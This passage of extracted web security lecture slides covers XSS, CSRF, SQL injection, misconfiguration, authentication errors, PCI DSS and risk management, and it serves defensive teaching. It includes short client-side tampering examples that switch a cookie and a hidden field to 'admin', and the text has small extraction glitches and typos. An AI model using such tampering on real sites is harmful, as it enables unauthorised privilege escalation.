The attacker now has everything needed to login (and transfer money)
Web Security Lecture by Dr Theodosis Mourouzis (c)
Phishing via XSS
133
Web Security
•
Attacker’s script determines the sites the victim has visited in the past
•
This information can be used for targeted phishing attacks
Web Security Lecture by Dr Theodosis Mourouzis (c)
Privacy Violation via XSS
134
Web Security
Cross-Site Request Forgery (CSRF)
Web Security Lecture by Dr Theodosis Mourouzis (c)
1. Victim is logged into vulnerable web site
135
Web Security
1.
Victim is logged into vulnerable web site
2.
Victim visits attacker’s web site
Web Security Lecture by Dr Theodosis Mourouzis (c)
Cross-Site Request Forgery (CSRF)
136
Web Security
1.
Victim is logged into vulnerable web site
2.
Victim visits attacker’s web site
3.
Malicious content is delivered to victim
Web Security Lecture by Dr Theodosis Mourouzis (c)
Cross-Site Request Forgery (CSRF)
137
Web Security
1.
Victim is logged into vulnerable web site
2.
Victim visits attacker’s web site
3.
Malicious content is delivered to victim
4.
Victim involuntarily sends a request to the vulnerable web site
Web Security Lecture by Dr Theodosis Mourouzis (c)
Cross-Site Request Forgery (CSRF)
138
Web Security
Attacker submits HTTP request with a malicious parameters value that
modifies an existing SQL query, or adds new queries
Web Security Lecture by Dr Theodosis Mourouzis (c)
SQL Injection
139
Web Security
Attacker submits HTTP request with a malicious parameters value that
modifies an existing SQL query, or adds new queries
Web Security Lecture by Dr Theodosis Mourouzis (c)
SQL Injection
140
Web Security
Misconfiguration
- outdated versions of the server
- outdated versions of third party web applications
- guessable passwords (application, FTP/SSH)
- retrievable source code
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
141
Web Security
Do not rely on client-side controls that are not enforced on the server-side
-- Cookie
Cookie: role=guest
Cookie: role=admin
-- Hidden form parameters
<input type=“hidden” name=“role” value=“guest”>
<input type=“hidden” name=“role” value=“admin”>
-- JavaScript checks
function validateRole() { return 1;}
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
142
Web Security
Authentication Errors
- weak passwords
- brute forceable (enforce upper limit on the number of errors in a give time)
- verbose failure messages (“wrong password”): Do not leak information
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
143
Web Security Lecture by Dr Theodosis Mourouzis (c)
Compliance
144
PCI DSS
•
A proprietary information security standard for organizations that handle
branded credit cards from major card schemes
(Visa, MasterCard, American Express, Discover, JCB and China UnionPay)
•
Private cards which are not part of a major card scheme are not included in
the score of PCI DSS
•
It is mandated by card brands and administrated by Payment Card
Industry Security Standards Council
Web Security Lecture by Dr Theodosis Mourouzis (c)
Payment Card Industry Data Security Standard (PCI-DSS)
145
•
Its purpose is to increase controls around cardholder data to reduce credit
card fraud via its exposure
•
Validation of compliance
- needs to be every year
- either by external Qualified Security Accessor (QSA) that creates a
Report on Compliance (ROC) for organizations handling large volumes of
transactions
- or by Self-Assessment Questionnaire (SAQ) for companies handling
smaller volumes
Web Security Lecture by Dr Theodosis Mourouzis (c)
PCI DSS
146
PCI DSS
•
PCI DSS originally began as 5 different programs
- MasterCard’s Site Data Protection
- American Express’ Data Security Operating Policy
- Discover’s Information Security and Compliance
- JCB’s Data Security Program
•
All 5 programs had same targets
- create additional level of protection for card issuers
- ensure merchants meet minimum level of security when store/process/transmit
cardholder data
•
PCI SSC was formed on Dec 2004 when these 5 companies released PCI DSS
Web Security Lecture by Dr Theodosis Mourouzis (c)
- Visa’s Cardholder Information Security Program
147
•
Version 1.0 (Dec 2004)
•
Version 1.1 (Sep 2006) – clarifications on v1.0
•
Version 1.2 (Oct 2008) – enhancements on addressing risks and threats
•
Version 2.0 (Oct 2010)
•
Version 3.0 (Nov 2013)
•
Version 3.1 (Apr 2015) – current one
Web Security Lecture by Dr Theodosis Mourouzis (c)
PCI DSS
148
PCI DSS
Web Security Lecture by Dr Theodosis Mourouzis (c)
PCI DSS specifies 12 requirements for compliance, organized into 6 logically
related groups called “control objectives”
149
PCI DSS
•
Information Supplement: Requirement 11.3 Penetration Testing
•
Information Supplement: Requirement 6.6 Code Reviews and Application
Firewalls Clarified
•
Navigating the PCI DSS: Understanding the Intent of the Requirements
•
Information Supplement: PCI DSS Wireless Guidelines
•
In the event of a security breach, any compromised entity which WAS NOT
PCI DSS compliant at the time of breach will be subject to additional card
scheme penalties, such as fines
Web Security Lecture by Dr Theodosis Mourouzis (c)
PCI SSC released several supplemental pieces of information for extra
clarification
150
Web Security Lecture by Dr Theodosis Mourouzis (c)
Risk Management Framework
151
Web Security Lecture by Dr Theodosis Mourouzis (c)
Risk Management Framework
152
Risk Management Framework
-
Ensure your company I.T. Governance policies exist and are current
-
Verify all key stakeholders members know about it
Protect
-
Known how your data flows
-
Understand where it flows from and to and how it’s protected
-
Check for vulnerabilities and data leakage
-
Policies exist current and follow governance
-
Seek insurance policies to help the risk
Web Security Lecture by Dr Theodosis Mourouzis (c)
Identify
153
Risk Management Framework
-
Detection for anomalies are in place
-
Real word testing is performed periodically
Respond
-
Review action plans associated with the event of a breach
-
Are skilled personnel on hand in the event of a breach?
Recover
-
Establish a recovery plan to implement after a breach
-
Prepare communication of recovery to internal and external parties affected
Web Security Lecture by Dr Theodosis Mourouzis (c)
Detect
154
•
No business is immune from a data breach
•
Security is a boardroom issue
•
Many executive don’t understand their organization’s information data flow
and/or how its being protected
•
Threats can come in all sorts of shapes and sizes
•
Insider misuse lead to inadvertent data leakage and breaches
•
The threat is not only technical, educate your employees
Web Security Lecture by Dr Theodosis Mourouzis (c)
Conclusions
155
